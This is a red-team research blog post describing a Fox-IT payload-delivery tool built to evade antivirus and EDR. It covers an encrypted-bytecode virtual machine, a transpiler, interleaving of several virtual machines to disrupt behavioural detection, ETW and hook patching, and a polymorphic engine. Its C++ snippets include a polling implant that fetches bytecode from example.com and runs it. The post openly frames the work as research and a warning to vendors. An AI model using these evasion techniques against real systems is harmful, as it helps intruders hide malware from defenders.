Authors: Boudewijn Meijer && Rick Veldhoven

Introduction

As defensive security products improve, attackers must refine their craft. Gone are the days of executing malicious binaries from disk, especially ones well known to antivirus and Endpoint Detection and Reponse (EDR) vendors. Now, attackers focus on in-memory payload execution for both native and managed applications to evade defensive products. Meanwhile, defensive technologies are becoming increasingly sophisticated, which is forcing attackers to further adapt. In times of such an arms race, how does an attacker stay ahead? And how can malware be future-proofed to evade the sophisticated EDR systems that currently exist and are actively being developed?

This blog post reviews the evolution of one of Fox-IT’s evasive tools, designed to aid in payload delivery during Red Teaming engagements. We will touch on the tool’s history and its future potential in the face of offensive and defensive progress.

Historical Perspective

The core of the arms race between malware and antimalware is as follows: antimalware must classify arbitrary programs, in memory or at-rest, as either benign or malicious while operating under a set of constraints. The products are constrained by the amount of performance a user or customer is prepared to surrender in terms of CPU time, memory or bandwidth while the classification takes place, and by how many false-positives the product generates. If the product is too resource intensive, a customer will complain it is slow. If it quarantines important documents, it potentially does more harm than good. These constraints shape and limit each step in the evolution of antimalware products. Not only AV vendors need to worry about performance when writing tools. Malware authors need to take execution speed, or other system changes, into account when deploying malware. Take for example the recently uncovered XZ1 backdoor that was spotted by a software engineer due to an increase in login time from 0.2 to 0.8 seconds. Had the authors of this piece of code not observably changed the behavior of the system, the backdoor would have likely been deployed successfully.

Since the early days of viruses circulating on floppy disks, writing undetected malware has been a cat-and-mouse game between attackers and defenders. Originally, antivirus software focused strictly on true-positive detection of viruses on the basis of signatures and patterns in a program’s instructions. Absent a mistake in the signature database, a unique signature match guarantees a true-positive match of a malicious sample after which the malicious file can be removed or quarantined. This method of detection strongly adheres to the constraints placed on antimalware products, because simple pattern matches are performant and true-positive detection is almost guaranteed.

For malware authors, the solution was simple: to evade detection, the virus must be made impossible to detect through a unique pattern. This may be achieved by changing the code, or by encrypting the code and decrypting it at runtime. If you automate this, you get what is called a packer: a tool that encrypts, compresses or otherwise changes a virus to evade detection. A packer changes the majority of the code in the virus and adds a stub to the code. This stub is often the first piece of code that is executed when the program is launched. Its job is to undo all changes previously made to the original code (e.g. compression or encryption). After all changes are reverted, execution will be passed to the original code. This stub can also make use of anti-reversing/anti-tampering code that attempts to protect the original code from prying eyes.

This reduces the amount of “attack surface” for signature creation for samples that are on the disk or otherwise stored at rest. This method is also used to compress binaries for distribution, allowing for smaller release packages. Therefore, not all compressed binaries can be marked as malicious.

However, even very small unpacker stubs may match a signature that can be uniquely tied to the packer itself. Combining this signature with some rules related to the amount of entropy in a file, a packer can still be detected with a high degree of accuracy. At this point, the antimalware solution has evolved to utilize metadata about a file, such as entropy, obtaining the ability to detect packed files but at the cost of a higher false-positive rate.

The next step in the arms race for malware authors is to eliminate the potential for a signature match in the unpacker stub. This means that the stub must consist of different instructions each time a new sample is created. An important insight is that “what the code does” and “how the code looks” are not 1:1 mappings. There are infinitely many ways to write down computer code to achieve a certain effect or result. There are therefore infinitely many ways in which a particular unpacking algorithm can be written. A packer that is designed to create the unpacking stub that looks different each time can be called polymorphic. The algorithm or code that performs the changes is called a polymorphic engine2.

Combining a packer with a polymorphic engine eliminates the “attack surface” for simple signature matches of malware at-rest. Fox-IT has written and maintained two polymorphic packers like this since 2015. Although they still produce good results against modern EDR, even these tools are getting more and more difficult to sneak past defenses. That’s because there’s a conceptual flaw in the polymorphic packer: the original malicious code is still decrypted at some point in order to execute. If antimalware products can time the moment to start scanning for malicious patterns when the packer has finished decoding the malicious code, then detecting malware becomes easy again.

Modern operating systems and processors try to ensure that not all data in a computer’s memory can be executed as code for safety reasons3. Particularly, systems are typically designed to prevent the execution of code from writable pages. Therefore, a virus or malware sample that wants to decrypt and/or decompress its own code must first make the changes in writable memory pages. After, the virus changes the page protection to readable and executable and transfers control to the newly modified executable memory. Antimalware products equipped to analyze the behavior of other programs at runtime make use of behavioral patterns like this to decide when to scan the memory of a process for malicious patterns. Because the memory, once decrypted, cannot be changed anymore due to the aforementioned limitations, scanning a process after making memory executable is the ideal time to spot malicious patterns.

Antimalware products that are equipped with rules that generate additional signals to determine if a program is malicious or not, are said to employ “heuristics”. Conceptually, antimalware products have achieved a comprehensive set of features to detect malware execution. The evolutions we’ve seen since the early days of these feature complete products can all be understood as attempts to loosen or lift the constraints set out above: “Cloud-based protection” runs resource intensive heuristics on someone else’s computer; adding human oversight, the “R” in “EDR” lowers the impact of a false-positive and brings humans into the detection and response loop.

How then, can a Red Team smuggle their malware past these new and advanced defenses? In the past, a virus writer might employ what is called a “metamorphic” engine4. This is an algorithm designed to re-write the entire virus each time it infects a new file, including the entire metamorphic engine itself. Using it ensures that there is never one ‘true’ virus sample that can be detected with a static signature; each copy of the virus is completely different. With a tool like this you would not need a packer, because there are no static patterns that can ever be uniquely tied to your virus. However, the explosion in modern software complexity and the requirement for malware to work on a variety of systems

Hiding From Analysis: Virtualisation

To hide from both static and dynamic analysis of payloads, the generated sample must be resilient to code inspection and code flow analysis. If the real instructions are not revealed to an observer, hardly any conclusions can be drawn from the outer shell. If this is achieved, defensive products would be met with the following limitations when inspecting the payload:

  • Difficult to observe instruction patterns;
  • Difficult to patch instructions;
  • Difficult to ignore instructions;
  • Difficult to predict behavior.

Hiding instructions is not something new. Products like VMProtect5 cloak parts of the code by embedding a virtual machine and generate unique instructions to be executed on this VM. Code that is to be virtualized must be identified either by a marker added to the source code or by the presence of a PDB file containing the symbols. This requirement is something that cannot always be met when using third-party tools. Additionally, this type of protection is aimed at protecting specific functions, like license key checking algorithms, limiting the use for an adversary. Lastly, using existing tools can have a negative impact on the detection ratio, as these products are heavily researched and can contain static signatures like hardcoded section names.

Considering the benefits of a virtualisation layer, however, it is clear that this technique is very powerful.

Creating a Custom Virtualisation Layer

It was decided that a virtualisation layer should be created. This layer consists of a virtual machine implementing opcodes6, and bytecode7 executing on the virtual machine. The virtualisation layer that was to be created must match the following requirements and limitations:

  1. Bytecode instructions are executed sequentially;
  2. Bytecode instructions are hidden before and after execution;
  3. The instruction set supports basic x86-64 instructions only;
  4. The virtual machine must provide an interface to the system API;
  5. The virtual machine implementation must be simple and position independent to support morphing;
  6. The virtualisation layer must work without access to source code or debug symbols.

Creating a virtualisation layer started with a design of the instructions to be executed, the virtual machine, and the supported instruction set. Additionally, the layout of the final payload was created where all data must be present in a position independent format and could be executed like shellcode. This allows the payload to be embedded in other executable formats (e.g. executables or DLLs), and allows for dynamic execution when staging malware.

For example, the following layout would allow for the above functionality. In this example, the virtual machine must start with a correcting stub that correctly sets the virtual machine argument registers to their respective values:

Example of a data structure containing all required building blocks within position independent code.

The Anatomy of an Instruction

To keep the virtual machine architecture simple, an instruction format was created to be consistent in length between instruction and operand types. This design decision allows the omission of a Length Disassembler Engine (LDE)8, and can simply use the instruction pointer as an index to the current instruction. All information present in normal, non-SSE9/AVX10 x86 instructions must be included.

At its core, an instruction identifies the operation that must be performed, and optionally what data is provided in the form of operands. An operand can be one of three types:

  1. Immediate value: a constant value embedded in the instruction;
  2. Memory location: a memory location pointed to by the instruction;
  3. Register: a register, or part of one, identified by the instruction.

In order to obtain data from an operand, a generic format must be created that encompasses the different operand types. It was decided that a single 64-bit field could be used to hold the different types of operands, as all of the necessary data of the aforementioned types can be embedded into 64 bits.

The structures below show the layout of each operand type:


struct ImmediateOperand {
Value value; // A constant value
}; // size: 8 bytes
struct MemoryOperand {
uint8_t size; // The effective size of the operand (8, 16, 32, 64 bits)
uint8_t base; // A regiser holding a pointer value to the base address
uint8_t index; // A register holding the index of the array
uint8_t scale; // A constant multiplier of 1, 2, 4, or 8
int32_t displacement; // A value to be added to the calculated address
}; // size: 8 bytes
struct RegisterOperand {
uint8_t reg; // A base register of the x86-64 register set
uint8_t chunk; // The specific register chunk: low, high, word, dword, qword
uint16_t size; // The effective size of the operand (8, 16, 32, 64 bits)
uint32_t pad; // Padding to meet the 64 bit size requirement
}; // size: 8 bytes
union Operand {
ImmediateOperand imm; // View the data as an immediate operand
MemoryOperand mem; // View the data as a memory operand
RegisterOperand reg; // View the data as a register operand
}; // size: 8 bytes

view raw

operand.h

hosted with ❤ by GitHub

Note: The Value type of the immediate operand is a simple union with (u)int8_t to (u)int64_t members. This makes it trivial to index the correct data during implementation of opcodes.

To indicate the instruction’s opcode, a single 1-byte value can be used. This provides 256 unique opcodes, which should be enough to implement basic behavior. Lastly, the type of each operand must be embedded within the instruction format, as opcode implementations must be able to interrogate these types.


struct Instruction {
uint8_t opcode; // The opcode of the instruction
uint8_t lparam_type : 4; // The type of the first (left) operand
uint8_t rparam_type : 4; // The type of the second (right) operand
Operand lparam; // The first (left) operand
Operand rparam; // The second (right) operand
}; // size: 18 bytes

view raw

instruction.h

hosted with ❤ by GitHub

Protecting Instructions

To meet requirement two, “Instructions are hidden before and after execution”, instructions are protected using encryption. Many encryption algorithms can be used to hide instructions. However, it is required for the instruction size to remain the same, as the instruction will be decrypted and encrypted in-place and will not be moved to a temporary buffer. This removes the necessity for dynamic memory allocation from within the virtual machine. Additionally, the chosen encryption scheme must be trivial to implement, as the code will be located in the virtual machine and thus create an ‘attack surface’ for signature detection. Implementing complex algorithms is detrimental to the ability to effectively manipulate the code using a polymorphic engine.

The Anatomy of the Virtual Machine

The virtual machine resembles a virtual CPU, implementing all the available opcodes. Furthermore, the available registers, CPU flags, and stack are part of the virtual machine object. Lastly, the virtual machine holds a pointer to the bytecode buffer necessary for execution. An added benefit of implementing the virtual machine is that the real stack is also abstracted away. Heuristics that attempt to spot malicious behavior from the stack will not succeed.


struct Context {
uint32_t ip; // Instruction pointer
uint8_t flags; // CPU flags to be manipulated by opcodes
Register registers[17]; // General Purpose Registers (rax, … r15 and gs)
Instruction* instructions; // A pointer to the start of the bytecode buffer
uint8_t stack[STACK_SIZE]; // The virtual machine stack
};

view raw

context.h

hosted with ❤ by GitHub

Functions to initialize the virtual machine context, to obtain the current instruction, and to load and store values based on the instruction operands were created to aid in the implementation of opcodes within the virtual machine.

Once initialized, the virtual machine can enter its dispatch loop. This loop consists of obtaining the current instruction and executing the opcode identified by the opcode field in the instruction object. The instruction is decrypted before execution and is encrypted after. A dispatch function could be implemented as follows:


void dispatch_instruction(Context* vm) {
uint32_t ip = vm->ip;
decrypt_instruction(vm, ip);
switch (vm->instructions[ip].opcode) {
case Opcode::ADD: opcode_add(vm); next_instruction(vm); break;
case Opcode::AND: opcode_and(vm); next_instruction(vm); break;
case Opcode::BT: opcode_bt(vm); next_instruction(vm); break;
}
encrypt_instruction(vm, ip);
}

view raw

dispatch.cpp

hosted with ❤ by GitHub

An attentive reader may have noticed the construction of the temporary variable ip, which is used in further operations. This originates from the fact that any instructions modifying the instruction pointer, like jcc, call, and ret, will result in a modified instruction pointer when the opcode is finished. Therefore, the instruction pointer can no longer be used to re-encrypt the original instruction that was executed.

Implementation of a Basic Opcode

The following function implements the bit test (bt) opcode11:


void opcode_bt(Context* vm) {
// get the current instruction from the context
Instruction* i = get_current_instruction(vm);
// load the value and the bit to test
Value dst = fetch_value(vm, i->lparam_type, i->lparam);
Value src = fetch_value(vm, i->rparam_type, i->rparam);
// get the size in bits of the value to check
size_t size = get_operand_size(i->lparam_type, i->lparam);
// set the carry flag to the result of the bit test
switch (size) {
case 8: vm->flags.cf = (dst.u8 & (1 << src.u8)) != 0; break;
case 16: vm->flags.cf = (dst.u16 & (1 << src.u16)) != 0; break;
case 32: vm->flags.cf = (dst.u32 & (1 << src.u32)) != 0; break;
case 64: vm->flags.cf = (dst.u64 & (1ull << src.u64)) != 0; break;
}
}

view raw

opcode_bt.cpp

hosted with ❤ by GitHub

Improving the Bytecode Process: Transpiling

Initially, all bytecode created to execute in the virtual environment was written in assembly by hand. This provided the control needed to make sure specific opcodes and operand types were used, and as a test a PE loader was implemented in bytecode. As this limitation came at a major cost in development time and flexibility, a new method of generating bytecode was used: compiling and transpiling of C/C++ programs. This was chosen over using output directly from the assembler, as parsing these text files proved to be cumbersome and error-prone. Instead, the resulting linked binary was fed to a disassembler.

The disassembling of a binary is performed using the iced-x86 library12. This library allows for the conversion of x86 instructions to the custom format -described in the earlier section: The Anatomy of an Instruction– by checking the opcode of the instruction, the types of operand(s) and its value(s). Eventually, once all the x86 instructions are converted, the now transpiled bytecode can be interpreted by the virtual machine.

The bytecode generation process from source code to eventual bytecode.

The implementation of the transpiler instantly enabled us to support a large amount of existing tools, and made writing new tools easier. Most Position-independent Code (PIC)13 tools that compile from C/C++, including some BOFs14, can also be ported to execute on the virtual machine with relative ease.

Limitations to Bytecode Implementation

One of the limitations of the virtual machine implementation is shared with that of the bytecode. PIC must be created in order to generate valid bytecode that executes on the VM. In practice, this means that everything is relative to the current instruction pointer, and no references to other libraries or parts of other sections can exist:

  • No static variables;
  • No global variables;
  • No strings;
  • No static dependencies on libraries.

Supporting Native API Calls

To allow interfacing with the OS layer, bytecode must be able to perform native API calls. A translation layer must exist between the bytecode and native environment. The call instruction is used by compilers to invoke APIs, requiring the virtual machine’s call implementation to support this translation. Unfortunately, once a call instruction is encountered, no information is known to the virtual machine related to the number of arguments that must be forwarded. To resolve this problem, the bytecode can prepend the number of arguments when calling an API, giving the virtual machine layer enough information to translate the call into native execution. To programmatically perform this task, variadic arguments in C++ templates can be used to automatically deduce the amount of arguments passed:


template <typename Ret, typename … Args>
struct apicall<Ret(Args…)> {
static decltype(auto) call(const void* target, Args … args) {
constexpr size_t nargs = sizeof…(Args); // Calculate the number of arguments passed
using f = Ret(__stdcall*)(size_t, Args…); // Define the signature of the API to call
return ((f)target)(nargs, args…); // Invoke the API and return its result
}
};
int main() {
FARPROC _Sleep = get_address_of_sleep();
apicall<decltype(Sleep)>::call(_Sleep, 10’000);
return 0;
}

view raw

apicall.cpp

hosted with ❤ by GitHub

As specified in Microsoft’s x64 __stdcall15 calling convention, the first four integer or pointer arguments are passed using the registers rcx, rdx, r8 and r9, with the remaining arguments being passed on the stack. This means that at the time of executing the call instruction, rcx holds the number of arguments that must be passed to the API. The virtual machine can extract and inspect this value, and use it to correctly perform the call:


auto target = fetch_value(vm, i->lparam_type, i->lparam);
auto nargs = vm->registers.rcx.qword;
// extract the arguments
// Invoke the api
auto result = syscall(target, …);
// return the result to the bytecode environment
vm->registers.rax = result;

view raw

vm.cpp

hosted with ❤ by GitHub

The real values of the arguments are stored in rdx, r8, r9 and on the stack. When extracting the arguments from the stack, one must remember to keep the shadow space16 in mind.

Visually, the process looks like this:

A virtualized call instruction invokes ntdll!NtAllocateVirtualMemory. This call is translated to a native call and the API is invoked. The resulting value is returned to the VM.

Supporting Bytecode Function Callbacks

Keeping in mind the porting of existing programs to the bytecode architecture, one cannot omit the support for function callbacks within code. Take for example a simple linked list implementation, with a list_search function taking a predicate callback:


struct Node {
int value;
node* next;
};
struct SearchContext {
int value;
};
Node* list_search(Node* head, bool(*predicate)(Node* n, const void* ctx), const void* ctx);
bool searcher(Node* n, const void* ctx) {
return n->value == ((SearchContext*)ctx)->value;
}
int main() {
Node head;
// initialize and populate list
SearchContext ctx = { 10 };
Node* found = list_search(&head, searcher, &ctx);
return 0;
}

view raw

list_search.cpp

hosted with ❤ by GitHub

However, a problem arises: how does the virtual machine differentiate between a normal bytecode function call, a native API call, and a function callback? The difference between the first two is clear: the bytecode function call is a call to an address within the bytecode and is known at compile time, where the API call is a dynamic call, meaning a call to a function pointer stored in a register or memory location. Given that a callback within bytecode is a dynamic call, too, the virtual machine must be provided with information about the type of call being made.

To load a function pointer as an argument, a lea17 instruction is generated with its right operand referencing a memory address. This referenced memory address uses the instruction pointer (rip) register as the base field of the memory operand. When transpiling, such cases can be identified. To store this information, a new type of operand can be added to the already existing three types -listed in “The Anatomy of an Instruction”– (e.g. Function). When the virtual machine executes the lea instruction, it can check for the type of operand. If this operand’s type is Function, a tag can be added to the high 32 bits of the value, for example 0xDEADBEEF.


value = (0xDEADBEEFull << 32) | (value & 0xffffffff);

view raw

tag_example.cpp

hosted with ❤ by GitHub

Once the call instruction is invoked, the value of the operand can be interrogated. If this value contains the previously added tag, a callback is requested. To perform the call, the tag is stripped from the value and the instruction pointer can be set accordingly.

Supporting User-Defined Arguments

Depending on the type of program that is executing, user-defined arguments are required. Take for example a program that simply sleeps for a period of time. How long should this program sleep for? Hardcoding these values is not always an option. Early on in the development of the project, a simple data structure was defined which could be provided to the bytecode’s entry point:


struct Data {
size_t size; // Size of data including the `Data` header
uint8_t key[KEY_SIZE]; // Decryption key of the payload
uint8_t payload[0]; // Payload data
};
int bytecode_main(Data* data);

view raw

bytecode.cpp

hosted with ❤ by GitHub

Accompanying this, each bytecode project contained a script that packaged data in a way that could be understood by the bytecode. However, there was no consistency between these scripts and the method of extraction. For example, extracting two 4-byte integers is simpler than extracting two strings due to their variable size.

To standardize this process, and to include it into the building step itself instead of running a random script, a key-value solution was created in combination with an API that can interrogate the type and value of each argument. This is different from parameter packing that Cobalt Strike uses in its BOFs18, as default arguments, or arguments that are not strictly required are supported. Additionally, each argument is encrypted separately. This allows for a PE packer to extract domain-keying information before extracting the PE data.

The following API is defined:


enum Type {
Invalid, Boolean, Integer, String, Data
};
struct Argument {
size_t size; // The size of the argument including the header
Type type; // The type of the argument
size_t tag; // The identifying tag of the argument
uint8_t key[KEY_SIZE]; // The payload encryption key
uint8_t payload[0]; // The argument data
};
struct Arguments {
size_t size; // The total size of all arguments in bytes
size_t count; // The count of arguments present in the argument pack
uint8_t arguments[0]; // The argument data
};
bool has_argument(Arguments* args, size_t tag);
Argument* get_argument_by_tag(Arguments* args, size_t tag);
void decrypt_argument(Argument* arg);
void encrypt_argument(Argument* arg);
// utility functions to interpret the argument’s payload
bool get_argument_boolean(Argument* arg);
int64_t get_argument_integer(Argument* arg);
char* get_argument_string(Argument* arg);
void* get_argument_data(Argument* arg, size_t* size);

view raw

api.cpp

hosted with ❤ by GitHub

The signature of the bytecode’s entry point is updated to incorporate this change:


int bytecode_main(Arguments* args);

view raw

bytecode_args.cpp

hosted with ❤ by GitHub

Supporting DLLs

Executables and DLLs are very similar in the way they look and in the way they execute. Both have an entry point to which execution is passed, and both return a value. However, the execution flow of an executable starts at the entry point, and does not reach its function’s end until the program stops. DLLs often perform very limited initialization within their entry point, and return execution to the loader to not lock the loader threads. Additionally, the entry point of the DLL is called more than once: on process startup and shutdown, and on thread creation and destruction. The reason for calling the entry point is passed by the loader in the second, dwReason, argument. This allows the code inside of the DllMain function to differentiate between the reasons the entry point was invoked, and can act accordingly.


BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);

view raw

dllmain.h

hosted with ❤ by GitHub

To allow our shellcode to be embedded within DLLs, both the virtual machine and its bytecode must be made aware of the reason for invocation. This requires the entry point of the virtual machine and bytecode to match that of a DLL, automatically receiving the reason by the OS loader. This does not interfere with the entry point used by a normal executable, as the default entry point of any executable does not take any arguments directly, but instead the arguments argc and argv are resolved by the C runtime, which is not linked against.

On initialization, the virtual machine sets the bytecode’s rdx register to the value of its reason argument, passing the value to the entry point as the second argument. The programmer must decide if this value is to be inspected within the bytecode and should not use the value when writing bytecode to be embedded in an executable.

Deceiving Behavioral Analysis: Multi-VM Execution

Earlier, the method of detection based on behavior was discussed. This dynamic form of inspecting an application’s execution flow regardless of static patens is difficult for attackers to rid their malware of. Opening Lsass.exe and reading its memory could be marked as malicious, even if the process looks like calc.exe. Often, defensive products receive events by kernel callbacks, such as PsSetCreateProcessNotifyRoutine19 or PsSetLoadImageNotifyRoutine20, API/syscall hooks in the local process or by using Event Tracing for Windows (ETW)21 consumers.

Patching hooks in the local process along with local ETW functions that provide events is trivial. This rids the process of intrusive monitoring by antivirus or EDR solutions, and stops the process from creating events. However, some events are still generated, mostly by the ETW providers present in the kernel, along with the kernel callbacks. Additionally, events created during patching could still be monitored. Lastly, blinding defensive products could have a negative effect, as failure to receiving check-ins could be considered an error and a signal of malicious behavior by itself.

As an attacker, generating arbitrary events along with ones that might cause detection could be a method of thwarting dynamic detection rules based on behavior. Adding code to generate events in between regular instructions would require manipulation of source code, and is not preferred. Creating a new thread that generates random events could be in vain, as events are registered per unique thread in the process.

The virtual machine was extended to support vmcalls. These types of call instructions made by the bytecode notify the virtual machine layer that a task needs to be performed. Among multiple different supported calls, most noteworthy are the following:

  • vminit: Initialize the virtual machine object with bytecode and arguments
  • vmexec: Execute N cycles on the virtual machine

The combination of these two calls allows bytecode to create a new virtual machine, and execute a predetermined number of instructions:


#define NUM_CYCLES 200
// load the malicious bytecode and create a vm object
auto malicious = load_malicious_instructions();
auto malicious_vm = allocate_vm_object();
// load the bytecode creating events
auto events = load_event_bytecode();
auto events_vm = allocate_vm_object();
// initialize the vm objects with their bytecode and no arguments
vmcall<vminit>::call(malicious_vm, malicious, nullptr);
vmcall<vminit>::call(events_vm, events, nullptr);
while (true) {
vmcall<vmexec>::call(malicious_vm, NUM_CYCLES);
vmcall<vmexec>::call(events_vm, NUM_CYCLES);
}

view raw

vm_call.cpp

hosted with ❤ by GitHub

Because both sets of bytecode execute within the same virtual machine, and therefore on the same thread, no distinction can be made between the origin of each event. The OS, and any event consumers will observe a single thread generating multiple events, both benign and possibly malicious. Most importantly for an attacker, this could break patterns of behavior being monitored for.

As an additional benefit of these added instructions, bytecode can now be obtained and executed at runtime. This proved to be an extremely useful feature during payload development, as instead of staging shellcode during Command and Control, bytecode can be provided. This removes the necessity for allocating executable memory regions (or changing memory protection at a later stage) to execute shellcode in, in turn removing the opportunity for defensive products to inspect buffers used for dynamic code execution often leveraged by attackers.

For example, the following behavior could be implemented to create a simple polling implant, requesting bytecode every 10 seconds:


// allocate the virtual machine object
auto vm = allocate_vm_object();
while (true) {
// attempt to obtain bytecode from server
void* bytecode = http_get(https://example.com/bytecode);
// check if we received bytecode
if (bytecode) {
// initialize the vm object with our bytecode and execute it in its entirety
vmcall<vminit>::call(vm, bytecode, nullptr);
vmcall<vmexec>::call(vm, RUN_UNTIL_END);
}
// free the bytecode buffer and sleep for 10 seconds
free(bytecode);
sleep(10’000);
}

view raw

polling_bytecode.cpp

hosted with ❤ by GitHub

Protecting the Virtual Machine

At this point, we have defeated most detection measures that we are aware of, and set out to defeat. However, the VM shares a fundamental weakness with the original packers: static patterns in the native-code VM. Throughout its development, the VM was kept as simple as possible, adhering to constraints set out to enable support for a polymorphic engine to be executed on the VM’s binary code. This made the development significantly more cumbersome, but, given a sufficiently strong polymorphic engine, does close the detection loop fully. The polymorphic engine we developed has been battle tested over several years of use against modern EDR, and antimalware. Despite the fact that the code of the engine was designed years ago, and has not significantly changed since, it still manages to mutate malicious code to the extent that it becomes undetected at runtime and scan time.

Due to the way the universe works, the engine cannot support arbitrary programs. The largest constraint is that dynamic control flow is not supported. This means that indirect function calls, indirect jumps and the ret instruction could all potentially break the mutated code. Our engine assumes you know what you’re doing, and won’t complain when such instructions are encountered, but the resulting code will likely not work as intended.

The polymorphic engine supports several different mutation techniques, including:

  • Instruction substitution: replacing instructions with semantically equivalent ones. For example: mov eax, 0 can be replaced with xor eax, eax;
  • Basic block reordering: changing the order of basic blocks in the code;
  • Basic block creation: inserting new basic blocks into the code, through jumps and push rets;
  • NOP instruction insertion: inserting NOP instructions to change the code’s layout.

The most important feature is that the output of the engine can be fed back into the engine again. This allows for multiple iterations of mutation, which leads to virtually incomprehensible disassembly. This is especially useful when the input is a small piece of code, like a shellcode loader. Sufficient numbers of mutation will double, or quadruple the size of the output, further muddying the waters for defenders.

Conclusion

Due to the ever-changing security landscape, both attackers and defenders must stay on their toes. Defensive security products continue to improve over time, making it more difficult for attackers to remain undetected, or even execute malicious code at all. Detection of payloads has shifted from static analysis to a combination of heuristics and signatures, rendering some tools obsolete.

In this blog post, we have described a tool that was written to tackle both static and dynamic analysis by way of virtualisation. This technique, along with employing a custom polymorphic engine attempts to evade these types of analysis by layers of obfuscation. To bypass heuristic analysis, support for multiple virtual machines to run concurrently was added, disrupting patterns in created events. As an added bonus, reverse engineering a sample without prior knowledge could be a daunting task. Analysts would have to reverse not only the morphed virtual machine itself, but extract morphed bytecode for further analysis. This does not remediate the issue of reverse engineering payloads for an attacker, but does significantly slow down the process, providing the attacker with more time.

In practice, this project has allowed attacks to remain undetected during Red Teaming and TIBER exercises in some of the most heavily monitored environments, making use of state of the art EDR solutions. Moreover, due to the addition of a transpiler converting compiled binaries into custom bytecode, both the speed and ease of development of custom payloads was greatly improved.

The following is a non-exhaustive list of payloads that were created during a recent Red Teaming exercise, successfully evading detection:

  • Multiple persistence modules;
  • Multiple lateral movement modules;
  • Shellcode and bytecode executor;
  • Antivirus and EDR patchers;
  • HTTP(s) and DNS beacons;
  • Tools querying Active Directory information.

Porting of additional tools is taking place, and we expect to have virtualized versions of most tools used in a Red Team exercise in the near future.

Looking Forward

The motivations for this blog post are two-fold. Firstly, we wanted to share what we think is exciting research with the community. We learned what we did from openly shared blog post and articles, and want to give back to the community. We use all the knowledge we gained to improve the security of our customers through offensive security testing, and we hope that this blog post will help and inspire others to do the same.

Secondly, although security products have advanced tremendously, we want to show that there is still room for improvement. We have noticed a tendency to “slap an EDR on it and call it a day” in certain niches of the security industry. Although that might work for some time, because a modern EDR truly adds a strong layer of security, the door is still open for attackers to bypass these products. As the landscape evolves, and general cyber security knowledge increases, the skill and sophistication of cyber criminal elements will rise. Consider this blog post, and the technique explained within, as a warning and a call to action. We hope security vendors will think about how they can detect these types of payloads, and how they can improve their products to stay ahead of the curve, as they are right now.

References

  1. https://www.openwall.com/lists/oss-security/2024/03/29/4 ↩
  2. https://en.wikipedia.org/wiki/Polymorphic_engine ↩
  3. https://en.wikipedia.org/wiki/Executable-space_protection ↩
  4. https://en.wikipedia.org/wiki/Metamorphic_code ↩
  5. https://vmpsoft.com/ ↩
  6. https://en.wikipedia.org/wiki/Opcode ↩
  7. https://en.wikipedia.org/wiki/Bytecode ↩
  8. https://en.wikipedia.org/wiki/Disassembler#Length_disassembler ↩
  9. https://en.wikipedia.org/wiki/Streaming_SIMD_Extensions ↩
  10. https://en.wikipedia.org/wiki/Advanced_Vector_Extensions ↩
  11. https://www.felixcloutier.com/x86/bt ↩
  12. https://github.com/icedland/iced ↩
  13. https://en.wikipedia.org/wiki/Position-independent_code ↩
  14. https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_main.htm ↩
  15. https://learn.microsoft.com/en-us/cpp/cpp/stdcall ↩
  16. https://devblogs.microsoft.com/oldnewthing/20160623-00/?p=93735 ↩
  17. https://www.felixcloutier.com/x86/lea ↩
  18. https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics_aggressor-scripts/as-resources_functions.htm#bof_pack ↩
  19. https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreateprocessnotifyroutine ↩
  20. https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetloadimagenotifyroutine ↩
  21. https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/event-tracing-for-windows–etw- ↩